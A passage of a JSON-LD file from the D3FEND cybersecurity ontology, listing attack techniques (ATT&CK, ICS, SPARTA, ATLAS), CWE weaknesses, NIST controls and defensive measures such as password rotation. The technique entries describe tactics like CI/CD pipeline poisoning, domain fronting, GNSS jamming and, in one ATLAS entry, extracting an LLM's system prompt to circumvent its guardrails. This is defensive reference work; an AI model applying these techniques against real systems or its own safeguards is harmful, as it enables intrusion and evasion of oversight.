      "d3f:kb-article": "## How it works\n\nUsers may be requested to change their passwords on a regular schedule. Management servers with enterprise policies for account management provide the ability to change or reset passwords for accounts.\n\n## Considerations\n\nRequiring users to change their passwords frequently can result in insecure password practices by the user. The latest update of NIST SP 800-63B, Digital Identity Guidelines, recommends requiring password reset only when a known compromise has occurred, or every 365 days, rather than every 60 or 90 days.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-PasswordandKeyRotation-SSH"
      },
      "d3f:regenerates": {
        "@id": "d3f:Password"
      },
      "rdfs:label": "Password Rotation",
      "rdfs:seeAlso": [
        {
          "@id": "https://pages.nist.gov/800-63-3/sp800-63-3.html"
        },
        {
          "@id": "https://www.auditboard.com/blog/nist-password-guidelines/"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialRotation"
        },
        {
          "@id": "_:Nead1ee5bf34147889954fb20fe168820"
        }
      ]
    },
    {
      "@id": "_:Nead1ee5bf34147889954fb20fe168820",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:regenerates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Password"
      }
    },
    {
      "@id": "d3f:T1677",
      "@type": "owl:Class",
      "d3f:attack-id": "T1677",
      "d3f:definition": "Adversaries may manipulate continuous integration / continuous development (CI/CD) processes by injecting malicious code into the build process. There are several mechanisms for poisoning pipelines:",
      "rdfs:label": "Poisoned Pipeline Execution",
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutionTechnique"
      }
    },
    {
      "@id": "d3f:T1564.006",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1564.006",
      "d3f:creates": {
        "@id": "d3f:File"
      },
      "d3f:definition": "Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)",
      "d3f:executes": {
        "@id": "d3f:VirtualizationSoftware"
      },
      "d3f:may-add": {
        "@id": "d3f:VirtualizationSoftware"
      },
      "d3f:may-create": {
        "@id": "d3f:Directory"
      },
      "rdfs:label": "Run Virtual Instance",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1564"
        },
        {
          "@id": "_:Ncfd13782cc764364bf21fadb5f817c57"
        },
        {
          "@id": "_:N8a1fe5ce89a7459c9e5c2254e9113223"
        },
        {
          "@id": "_:N65d1f8cc73a1440985936cb2b59fa68a"
        },
        {
          "@id": "_:N12cbc8853c31442bbc54bb348ac8496f"
        }
      ]
    },
    {
      "@id": "_:Ncfd13782cc764364bf21fadb5f817c57",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "_:N8a1fe5ce89a7459c9e5c2254e9113223",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:executes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:VirtualizationSoftware"
      }
    },
    {
      "@id": "_:N65d1f8cc73a1440985936cb2b59fa68a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-add"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:VirtualizationSoftware"
      }
    },
    {
      "@id": "_:N12cbc8853c31442bbc54bb348ac8496f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Directory"
      }
    },
    {
      "@id": "d3f:AML.T0024.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0024.000",
      "d3f:definition": "Adversaries may infer the membership of a data sample or global characteristics of the data in its training set, which raises privacy concerns.\nSome strategies make use of a shadow model that could be obtained via [Train Proxy via Replication](/techniques/AML.T0005.001), others use statistics of model prediction scores.\n\nThis can cause the victim model to leak private information, such as PII of those in the training set or other forms of protected IP.",
      "rdfs:label": "Infer Training Data Membership - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0024.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0024"
      },
      "skos:prefLabel": "Infer Training Data Membership"
    },
    {
      "@id": "d3f:T1221",
      "@type": "owl:Class",
      "d3f:attack-id": "T1221",
      "d3f:definition": "Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, .xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together as ZIP archives composed of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)",
      "rdfs:label": "Template Injection",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_CM-14",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Signed Components",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:related": [
        {
          "@id": "d3f:DriverLoadIntegrityChecking"
        },
        {
          "@id": "d3f:MessageAuthentication"
        }
      ],
      "rdfs:label": "CM-14"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-2_4",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Account Management | Automated Audit Actions",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:related": {
        "@id": "d3f:DomainAccountMonitoring"
      },
      "rdfs:label": "AC-2(4)"
    },
    {
      "@id": "d3f:CWE-771",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-771",
      "d3f:definition": "The product does not properly maintain a reference to a resource that has been allocated, which prevents the resource from being reclaimed.",
      "rdfs:label": "Missing Reference to Active Allocated Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-400"
      }
    },
    {
      "@id": "d3f:Compiler",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computing, a compiler is a computer program that translates computer code written in one programming language (the source language) into another language (the target language). The name \"compiler\" is primarily used for programs that translate source code from a high-level programming language to a lower level language (e.g., assembly language, object code, or machine code) to create an executable program.",
      "d3f:reads": {
        "@id": "d3f:CompilerConfigurationFile"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Compiler"
      },
      "rdfs:label": "Compiler",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:BuildTool"
        },
        {
          "@id": "_:Nf5cafc974d8d4058898893e307847035"
        }
      ]
    },
    {
      "@id": "_:Nf5cafc974d8d4058898893e307847035",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:reads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CompilerConfigurationFile"
      }
    },
    {
      "@id": "d3f:Provider",
      "@type": "owl:Class",
      "d3f:definition": "Providers are entities that intentionally offer, supply, or facilitate goods, services, or resources through actions of their agents.",
      "rdfs:label": "Provider",
      "rdfs:subClassOf": {
        "@id": "d3f:Organization"
      }
    },
    {
      "@id": "d3f:T1089",
      "@type": "owl:Class",
      "d3f:attack-id": "T1089",
      "d3f:definition": "Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1562.001",
      "rdfs:label": "Disabling Security Tools",
      "rdfs:seeAlso": {
        "@id": "d3f:T1562.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:T1172",
      "@type": "owl:Class",
      "d3f:attack-id": "T1172",
      "d3f:definition": "Domain fronting takes advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) The technique involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the technique, \"domainless\" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1090.004",
      "rdfs:label": "Domain Fronting",
      "rdfs:seeAlso": {
        "@id": "d3f:T1090.004"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CommandAndControlTechnique"
      }
    },
    {
      "@id": "d3f:REC-0006.02",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0006.02",
      "d3f:definition": "Adversaries study how you test to learn what you don’t test. They inventory static analyzers and coding standards (MISRA/C, CERT, CWE rulesets), dynamic tools (address/UB sanitizers, valgrind-class tools), fuzzers targeted at command parsers and protocols (e.g., CCSDS TC/TM, payload formats), property-based tests, mutation testing, coverage thresholds, and formal methods applied to mode logic or crypto. They also examine HIL setups, fault-injection frameworks, timing/jitter tests, and regression suites that gate release. Gaps, such as minimal negative testing on rare modes, weak corpus diversity, or untested rate/size limits, inform exploit design and the timing of inputs to evade FDIR or saturate queues.",
      "rdfs:label": "Security Testing Tools - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0006/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0006"
      },
      "skos:prefLabel": "Security Testing Tools"
    },
    {
      "@id": "d3f:UnitTestExecutionTool",
      "@type": "owl:Class",
      "d3f:definition": "A unit test execution tool automatically performs unit testing.  Unit testing is a software testing method by which individual units of source code are tested to determine whether they are fit for use.  Unit test execution tools work with sets of one or more computer program modules together with associated control data, usage procedures, and operating procedures. This contrasts with integration testing, which tests inter-unit dependencies and the modules as a group.",
      "rdfs:label": "Unit Test Execution Tool",
      "rdfs:seeAlso": {
        "@id": "dbr:Unit_testing"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:TestExecutionTool"
      }
    },
    {
      "@id": "d3f:definition",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "x definition y: The d3fend object x has the definition y.",
      "rdfs:isDefinedBy": {
        "@id": "http://purl.obolibrary.org/obo/IAO_0000115"
      },
      "rdfs:label": "definition",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-annotation"
      }
    },
    {
      "@id": "d3f:UserAccountLockEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a user account is locked out due to failed authentication attempts or administrative action.",
      "rdfs:label": "User Account Lock Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserAccountEvent"
        },
        {
          "@id": "_:Nbe000996febe47728cd2b09ed208434a"
        }
      ]
    },
    {
      "@id": "_:Nbe000996febe47728cd2b09ed208434a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccountCreationEvent"
      }
    },
    {
      "@id": "d3f:EX-0016.03",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0016.03",
      "d3f:definition": "The attacker raises the noise floor in GNSS bands so satellite navigation signals are not acquired or tracked. Loss of PNT manifests as degraded or unavailable position/velocity/time solutions, which in turn disrupts functions that depend on them: time distribution, attitude aiding, scheduling, anti-replay windows, and visibility prediction. Because GNSS signals at the receiver are extremely weak, modest jammers within the antenna field of view can produce outsized effects; mobile emitters can create intermittent outages aligned with the attacker’s objectives.",
      "rdfs:label": "Position, Navigation, and Timing (PNT) Jamming - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0016/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0016"
      },
      "skos:prefLabel": "Position, Navigation, and Timing (PNT) Jamming"
    },
    {
      "@id": "d3f:CWE-72",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-72",
      "d3f:definition": "The product does not properly handle special paths that may identify the data or resource fork of a file on the HFS+ file system.",
      "rdfs:label": "Improper Handling of Apple HFS+ Alternate Data Stream Path",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-66"
      }
    },
    {
      "@id": "d3f:T1547.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1547.003",
      "d3f:definition": "Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.(Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.(Citation: Microsoft TimeProvider)",
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "Time Providers",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1547"
        },
        {
          "@id": "_:N089b002ed11442af8a5ebbc9e12c3d93"
        }
      ]
    },
    {
      "@id": "_:N089b002ed11442af8a5ebbc9e12c3d93",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:T1021.006",
      "@type": "owl:Class",
      "d3f:attack-id": "T1021.006",
      "d3f:definition": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.",
      "rdfs:label": "Windows Remote Management",
      "rdfs:subClassOf": {
        "@id": "d3f:T1021"
      }
    },
    {
      "@id": "d3f:T0857",
      "@type": "owl:Class",
      "d3f:attack-id": "T0857",
      "d3f:definition": "System firmware on modern assets is often designed with an update feature. Older device firmware may be factory installed and require special reprogramming equipment. When available, the firmware update feature enables vendors to remotely patch bugs and perform upgrades. Device firmware updates are often delegated to the user and may be done using a software update package. It may also be possible to perform this task over the network.",
      "rdfs:label": "System Firmware - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSInhibitResponseFunctionTechnique"
        },
        {
          "@id": "d3f:ATTACKICSPersistenceTechnique"
        }
      ],
      "skos:prefLabel": "System Firmware"
    },
    {
      "@id": "d3f:RDPTLSHandshakeEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the cryptographic exchange of keys and certificates between an RDP client and server to establish a secure communication channel. The handshake ensures encryption, integrity, and authentication for the session.",
      "rdfs:label": "RDP TLS Handshake Event",
      "rdfs:subClassOf": {
        "@id": "d3f:RDPEvent"
      }
    },
    {
      "@id": "d3f:OTNetworkManagementCommand",
      "@type": "owl:Class",
      "d3f:definition": "Manage message routing or network connection mechanisms.",
      "rdfs:label": "OT Network Management Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTProtocolMessage"
      }
    },
    {
      "@id": "d3f:T1218.007",
      "@type": "owl:Class",
      "d3f:attack-id": "T1218.007",
      "d3f:definition": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.",
      "rdfs:label": "Msiexec",
      "rdfs:subClassOf": {
        "@id": "d3f:T1218"
      }
    },
    {
      "@id": "d3f:AML.T0069.002",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0069.002",
      "d3f:definition": "Adversaries may discover a large language model's system instructions provided by the AI system builder to learn about the system's capabilities and circumvent its guardrails.",
      "rdfs:label": "System Prompt - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0069.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0069"
      },
      "skos:prefLabel": "System Prompt"
    },
    {
      "@id": "d3f:OTNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Network traffic generated by operational technology devices, e.g., programmable logic controllers.",
      "d3f:may-contain": {
        "@id": "d3f:OTProtocolMessage"
      },
      "rdfs:label": "OT Network Traffic",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTraffic"
        },
        {
          "@id": "_:N1a3d8700a409438cb8a481710a3d7fff"
        }
      ]
    },
    {
      "@id": "_:N1a3d8700a409438cb8a481710a3d7fff",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTProtocolMessage"
      }
    },
    {
      "@id": "d3f:DS0039",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Data sources with information about the set of devices found within the network, along with their current software and configurations",
      "d3f:exactly": {
        "@id": "d3f:AssetInventoryAgent"
      },
      "rdfs:label": "Asset (ATT&CK DS)"
    },
    {
      "@id": "d3f:ChangeDefaultPassword",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ChangeDefaultPassword"
      ],
      "d3f:d3fend-id": "D3-CDP",
      "d3f:definition": "Changing the default password means replacing the factory-set credentials with a strong, unique password before the device is deployed, preventing unauthorized access.",
      "d3f:hardens": {
        "@id": "d3f:OTController"
      },
      "d3f:kb-article": "## How it works\nChange the default password as soon as a new device is received. The default credentials are normally documented in an instruction manual that is either packaged with the device, published online through official means, or published online through unofficial means.\n\n## Considerations\n* These should be changed before a device is brought online so that an adversary cannot take advantage of these default credentials.\n* Strong and complex passwords are preferred if the technology allows.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-CPGChecklist"
        },
        {
          "@id": "d3f:Reference-GuideToOTSecurity"
        },
        {
          "@id": "d3f:Reference-MITREATTACKPasswordPolicies"
        }
      ],
      "d3f:strengthens": [
        {
          "@id": "d3f:Password"
        },
        {
          "@id": "d3f:UserAccount"
        }
      ],
      "rdfs:label": "Change Default Password",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:StrongPasswordPolicy"
        },
        {
          "@id": "_:Nf6028025973f4f5d9adc33dc17ae68e9"
        },
        {
          "@id": "_:N38b6569972614123837e634b302ee9a9"
        },
        {
          "@id": "_:Nacf5710527e948139d55cf859640ccd8"
        }
      ]
    },
    {
      "@id": "_:Nf6028025973f4f5d9adc33dc17ae68e9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hardens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTController"
      }
    },
    {
      "@id": "_:N38b6569972614123837e634b302ee9a9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:strengthens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Password"
      }
    },
    {
      "@id": "_:Nacf5710527e948139d55cf859640ccd8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:strengthens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:DNSServer",
      "@type": "owl:Class",
      "d3f:definition": "A Domain Name System (DNS) name server is a kind of name server.  Domain names are one of the two principal namespaces of the Internet. The most important function of DNS servers is the translation (resolution) of human-memorable domain names and hostnames into the corresponding numeric Internet Protocol (IP) addresses, the second principal name space of the Internet which is used to identify and locate computer systems and resources on the Internet.\n\nMore generally, a name server is a computer application that implements a network service for providing responses to queries against a directory service. It translates an often humanly meaningful, text-based identifier to a system-internal, often numeric identification or addressing component. This service is performed by the server in response to a service protocol request.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Name_server"
      },
      "rdfs:label": "DNS Server",
      "rdfs:subClassOf": {
        "@id": "d3f:Server"
      }
    },
    {
      "@id": "d3f:windows-registry-value",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "x value y: The key-value pair x has the data value y.",
      "rdfs:label": "windows-registry-value",
      "rdfs:subPropertyOf": {
        "@id": "d3f:windows-registry-data-property"
      },
      "skos:altLabel": "value"
    },
    {
      "@id": "d3f:risk-likelihood",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "Risk likelihood rating, expressed on a numeric scale from 1 (lowest likelihood) to 5 (highest likelihood) in the context of a 5x5 risk matrix.",
      "rdfs:isDefinedBy": {
        "@id": "https://www.cto.mil/wp-content/uploads/2024/05/RIO-2023-2-2.pdf"
      },
      "rdfs:label": "risk-likelihood",
      "rdfs:range": {
        "@id": "_:Nfd73d08cc2df44aba5f93e4d8a1b8449"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-data-property"
      }
    },
    {
      "@id": "_:Nfd73d08cc2df44aba5f93e4d8a1b8449",
      "@type": "rdfs:Datatype",
      "owl:onDatatype": {
        "@id": "xsd:integer"
      },
      "owl:withRestrictions": {
        "@list": [
          {
            "@id": "_:N047bdbca214047f889b5ccf300c6d916"
          },
          {
            "@id": "_:N1ab936c2155c44a08414b782a1d78359"
          }
        ]
      }
    },
    {
      "@id": "_:N047bdbca214047f889b5ccf300c6d916",
      "xsd:minInclusive": 1
    },
    {
      "@id": "_:N1ab936c2155c44a08414b782a1d78359",
      "xsd:maxInclusive": 5
    },
    {
      "@id": "d3f:OTReadDeviceConfigurationCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Read device configuration.",
      "rdfs:label": "OT Read Device Configuration Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTDeviceConfigurationCommandEvent"
        },
        {
          "@id": "_:N04225a47b8d9427eae0a510caad1a619"
        }
      ]
    },
    {
      "@id": "_:N04225a47b8d9427eae0a510caad1a619",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTReadDeviceConfigurationCommand"
      }
    },
    {
      "@id": "d3f:CWE-213",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-213",
      "d3f:definition": "The product's intended functionality exposes information to certain actors in accordance with the developer's security policy, but this information is regarded as sensitive according to the intended security policies of other stakeholders such as the product's administrator, users, or others whose information is being processed.",
      "rdfs:label": "Exposure of Sensitive Information Due to Incompatible Policies",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-200"
      }
    },
    {
      "@id": "d3f:CWE-131",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-131",
      "d3f:definition": "The product does not correctly calculate the size to be used when allocating a buffer, which could lead to a buffer overflow.",
      "rdfs:label": "Incorrect Calculation of Buffer Size",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-682"
      }
    },
    {
      "@id": "d3f:T0802",
      "@type": "owl:Class",
      "d3f:attack-id": "T0802",
      "d3f:definition": "Adversaries may automate collection of industrial environment information using tools or scripts. This automated collection may leverage native control protocols and tools available in the control systems environment. For example, the OPC protocol may be used to enumerate and gather information. Access to a system or interface with these native protocols may allow collection and enumeration of other attached, communicating servers and devices.",
      "rdfs:label": "Automated Collection - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSCollectionTechnique"
      },
      "skos:prefLabel": "Automated Collection"
    },
    {
      "@id": "d3f:DHCPNakEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a DHCP server sends a NAK message to reject a client's REQUEST, indicating that the requested configuration cannot be granted.",
      "rdfs:label": "DHCP Nak Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DHCPEvent"
        },
        {
          "@id": "_:N920ae70b7f134f4ebd8bf35a5fe3d583"
        }
      ],
      "skos:altLabel": "DHCPNAK"
    },
    {
      "@id": "_:N920ae70b7f134f4ebd8bf35a5fe3d583",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DHCPRequestEvent"
      }
    },
    {
      "@id": "d3f:StoredProcedure",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A stored procedure (also termed proc, storp, sproc, StoPro, StoredProc, StoreProc, sp, or SP) is a subroutine available to applications that access a relational database management system (RDBMS). Such procedures are stored in the database data dictionary.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Stored_procedure"
      },
      "rdfs:label": "Stored Procedure",
      "rdfs:subClassOf": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:T1140",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1140",
      "d3f:definition": "Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.",
      "d3f:invokes": {
        "@id": "d3f:CreateProcess"
      },
      "d3f:may-add": {
        "@id": "d3f:ExecutableFile"
      },
      "d3f:may-modify": {
        "@id": "d3f:EventLog"
      },
      "rdfs:label": "Deobfuscate/Decode Files or Information",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "_:Nac90e315600f4957af88eea803c6b291"
        },
        {
          "@id": "_:N4a056484945e4082afd93b89e5fdccc4"
        },
        {
          "@id": "_:Naf2f6d30bda74332a597e83a27088e24"
        }
      ]
    },
    {
      "@id": "_:Nac90e315600f4957af88eea803c6b291",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "_:N4a056484945e4082afd93b89e5fdccc4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-add"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "_:Naf2f6d30bda74332a597e83a27088e24",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EventLog"
      }
    },
    {
      "@id": "d3f:CWE-1266",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1266",
      "d3f:definition": "The product does not properly provide a capability for the product administrator to remove sensitive data at the time the product is decommissioned. A scrubbing capability could be missing, insufficient, or incorrect.",
      "rdfs:label": "Improper Scrubbing of Sensitive Data from Decommissioned Device",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-404"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2020-11-008%3AMSBuildAndMsxsl_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-11-008/"
      },
      "d3f:kb-abstract": "Trusted developer utilities such as MSBuild may be leveraged to run malicious code with elevated privileges. This analytic looks for any instances of msbuild.exe, which will execute any C# code placed within a given XML document; and msxsl.exe, which processes xsl transformation specifications for XML files and will execute a variety of scripting languages contained within the XSL file. Both of these executables are rarely used outside of Visual Studio.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-11-008: MSBuild and msxsl",
      "rdfs:label": "Reference - CAR-2020-11-008: MSBuild and msxsl - MITRE"
    },
    {
      "@id": "d3f:CCI-000067_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:RemoteTerminalSessionDetection"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system monitors remote access methods.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-14T00:00:00"
      },
      "rdfs:label": "CCI-000067"
    },
    {
      "@id": "d3f:M1041",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:DiskEncryption"
        },
        {
          "@id": "d3f:EncryptedTunnels"
        },
        {
          "@id": "d3f:FileEncryption"
        },
        {
          "@id": "d3f:MessageEncryption"
        }
      ],
      "rdfs:label": "Encrypt Sensitive Information"
    },
    {
      "@id": "d3f:Non-PersonEntity",
      "@type": "owl:Class",
      "d3f:definition": "An entity related to information technology with a digital identity that acts in cyberspace, but is not a human actor. This can include organizations, hardware objects (physical entities/devices), software objects (virtual/logical entities), and information artifacts.",
      "d3f:synonym": "NPE",
      "rdfs:label": "Non-Person Entity",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:NIST_SP_800-53_R5"
        },
        {
          "@id": "d3f:Reference-CNNSI-4009"
        },
        {
          "@id": "https://csrc.nist.gov/glossary/term/non_person_entity"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:Agent"
      }
    },
    {
      "@id": "d3f:CWE-548",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-548",
      "d3f:definition": "The product inappropriately exposes a directory listing with an index of all the resources located inside of the directory.",
      "rdfs:label": "Exposure of Information Through Directory Listing",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-497"
      }
    },
    {
      "@id": "d3f:T1654",
      "@type": "owl:Class",
